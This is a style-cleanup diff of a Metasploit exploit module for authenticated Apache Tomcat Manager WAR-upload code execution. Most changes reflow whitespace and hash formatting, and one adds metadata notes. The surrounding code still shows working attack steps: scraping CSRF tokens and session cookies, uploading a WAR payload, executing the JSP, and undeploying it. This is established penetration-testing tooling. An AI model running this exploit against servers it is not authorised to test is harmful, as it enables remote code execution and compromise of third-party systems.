@@ -14,21 +14,22 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::EXE
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Apache Tomcat Manager Authenticated Upload Code Execution',
-      'Description' => %q{
-        This module can be used to execute a payload on Apache Tomcat servers that
-        have an exposed "manager" application. The payload is uploaded as a WAR archive
-        containing a jsp application using a POST request against the /manager/html/upload
-        component.
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache Tomcat Manager Authenticated Upload Code Execution',
+        'Description' => %q{
+          This module can be used to execute a payload on Apache Tomcat servers that
+          have an exposed "manager" application. The payload is uploaded as a WAR archive
+          containing a jsp application using a POST request against the /manager/html/upload
+          component.
 
-        NOTE: The compatible payload sets vary based on the selected target. For
-        example, you must select the Windows target to use native Windows payloads.
-      },
-      'Author'      => 'rangercha',
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
+          NOTE: The compatible payload sets vary based on the selected target. For
+          example, you must select the Windows target to use native Windows payloads.
+        },
+        'Author' => 'rangercha',
+        'License' => MSF_LICENSE,
+        'References' => [
           # This is based on jduck's tomcat_mgr_deploy.
           # the tomcat_mgr_deploy o longer works for current versions of tomcat due to
           # CSRF protection tokens. Also PUT requests against the /manager/html/deploy
@@ -63,33 +64,42 @@ class MetasploitModule < Msf::Exploit::Remote
           # tomcat docs
           ['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html']
         ],
-      'Platform'    => %w{ java linux win }, # others?
-      'Targets'     =>
-        [
-          [ 'Java Universal',
+        'Platform' => %w{java linux win}, # others?
+        'Targets' => [
+          [
+            'Java Universal',
             {
-              'Arch'     => ARCH_JAVA,
+              'Arch' => ARCH_JAVA,
               'Platform' => 'java'
             }
           ],
           #
           # Platform specific targets only
           #
-          [ 'Windows Universal',
+          [
+            'Windows Universal',
             {
-              'Arch'     => ARCH_X86,
+              'Arch' => ARCH_X86,
               'Platform' => 'win'
             }
           ],
-          [ 'Linux x86',
+          [
+            'Linux x86',
             {
-              'Arch'     => ARCH_X86,
+              'Arch' => ARCH_X86,
               'Platform' => 'linux'
             }
           ]
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2009-11-09'))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2009-11-09',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
@@ -97,7 +107,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('HttpPassword', [false, 'The password for the specified username']),
         # /cognos_express/manager/ for Cognos Express (19300)
         OptString.new('TARGETURI', [true, "The URI path of the manager app (/html/upload and /undeploy will be used)", '/manager'])
-      ])
+      ]
+    )
   end
 
   def post_auth?
@@ -225,7 +236,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def detect_platform(body)
     return nil if body.blank?
 
-    i=0
+    i = 0
 
     body.each_line do |ln|
       ln.chomp!
@@ -237,25 +248,25 @@ class MetasploitModule < Msf::Exploit::Remote
           return 'win'
         elsif ln.include? "Linux"
           return 'linux'
-        elsif i==11
+        elsif i == 11
           return 'unknown'
         end
       end
 
-      i = i+1 if i > 0
+      i = i + 1 if i > 0
     end
   end
 
   def detect_arch(body)
     return nil if body.blank?
 
-    i=0
+    i = 0
     body.each_line do |ln|
       ln.chomp!
 
       i = 1 if ln =~ /OS Architecture/
 
-      if i==9 or i==11
+      if i == 9 or i == 11
         # check against x86_64 before x86 to make sure we don't match
         # incorrectly on x86 first
         if ln.include?('x86_64')
@@ -268,7 +279,7 @@ class MetasploitModule < Msf::Exploit::Remote
           return ARCH_X86
         elsif ln.include?('i686')
           return ARCH_X86
-        elsif i==11
+        elsif i == 11
           return 'unknown'
         end
       end
@@ -288,6 +299,7 @@ class MetasploitModule < Msf::Exploit::Remote
       ln.chomp!
       csrf_nonce = ln.index(CSRF_VAR)
       next if csrf_nonce.nil?
+
       token = ln[csrf_nonce + CSRF_VAR.length, 32]
       return token
     end
@@ -306,12 +318,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def send_war_payload(url, war)
     res = send_request_cgi({
-      'uri'          => url,
-      'method'       => 'POST',
-      'user'         => datastore['HttpUsername'],
-      'password'     => datastore['HttpPassword'],
-      'cookie'       => @session_id,
-      'vars_get'     => vars_get,
+      'uri' => url,
+      'method' => 'POST',
+      'user' => datastore['HttpUsername'],
+      'password' => datastore['HttpPassword'],
+      'cookie' => @session_id,
+      'vars_get' => vars_get,
       'vars_form_data' => [
         {
           'name' => 'deployWar',
@@ -328,12 +340,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def send_request_undeploy(url)
     res = send_request_cgi({
-      'uri'          => url,
-      'vars_get'     => vars_undeploy,
-      'method'       => 'POST',
-      'user'         => datastore['HttpUsername'],
-      'password'     => datastore['HttpPassword'],
-      'cookie'       => @session_id
+      'uri' => url,
+      'vars_get' => vars_undeploy,
+      'method' => 'POST',
+      'user' => datastore['HttpUsername'],
+      'password' => datastore['HttpPassword'],
+      'cookie' => @session_id
     })
 
     return res
@@ -342,6 +354,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def access_manager?
     res = query_manager
     return false unless res and res.code == 200
+
     @session_id = res.get_cookies
     @csrf_token = find_csrf(res)
     return true
@@ -373,8 +386,8 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Executing #{jsp_path}...")
 
     res = send_request_cgi({
-      'uri'          => jsp_path,
-      'method'       => 'GET'
+      'uri' => jsp_path,
+      'method' => 'GET'
     })
 
     return parse_execute_response(res)
